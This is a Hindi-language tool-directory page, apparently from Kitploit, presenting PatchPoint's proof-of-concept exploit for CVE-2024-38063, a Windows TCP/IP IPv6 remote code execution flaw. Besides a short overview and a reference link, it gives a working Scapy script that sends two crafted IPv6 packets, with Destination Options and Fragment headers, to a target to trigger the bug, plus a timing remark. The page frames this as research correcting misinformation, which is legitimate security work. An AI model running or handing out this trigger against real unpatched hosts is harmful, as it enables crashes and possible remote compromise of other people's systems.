Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-38063 — CVE-2024-38063 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक Windows TCP/IP रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो डेस्टिनेशन ऑप्शन और फ्रैगमेंट हेडर के साथ दो क्राफ्टेड IPv6 पैकेट भेजने से ट्रिगर होती है। | Kitploit
उपकरण/GitHubGitHub/patchpoint/cve-2024-38063
भेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

CVE-2024-38063 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक Windows TCP/IP रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो डेस्टिनेशन ऑप्शन और फ्रैगमेंट हेडर के साथ दो क्राफ्टेड IPv6 पैकेट भेजने से ट्रिगर होती है।

रिपॉजिटरी देखें
20322 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-38063

अवलोकन

अगस्त 2024 में, Microsoft ने Windows TCP/IP रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के लिए एक पैच जारी किया। कुछ शोधकर्ताओं ने पहले ही इस भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रकाशित कर दिए हैं, और लगभग उसी समय, PatchPoint शोधकर्ताओं ने भी इस मुद्दे का अपना विश्लेषण और पुनरुत्पादन पूरा कर लिया। विभिन्न प्लेटफार्मों, जिनमें Twitter भी शामिल है, पर गलत सूचना फैलने के कारण, ऐसा प्रतीत होता है कि इस भेद्यता को ट्रिगर करने के लिए आवश्यक महत्वपूर्ण बिंदुओं को गलत समझा गया है। इन अशुद्धियों के विपरीत, हमने एक ऐसा PoC जारी करने का निर्णय लिया है जो दर्शाता है कि केवल दो पैकेटों के प्रेषण से इस भेद्यता को कैसे ट्रिगर किया जा सकता है; वास्तव में, इस भेद्यता को ट्रिगर करने के लिए बड़ी संख्या में पैकेट आवश्यक नहीं हैं।

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ भेद्यता को ट्रिगर करने के लिए, लगभग 60 सेकंड की प्रतीक्षा समय आवश्यक है

संदर्भ

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
टूल डाउनलोड करें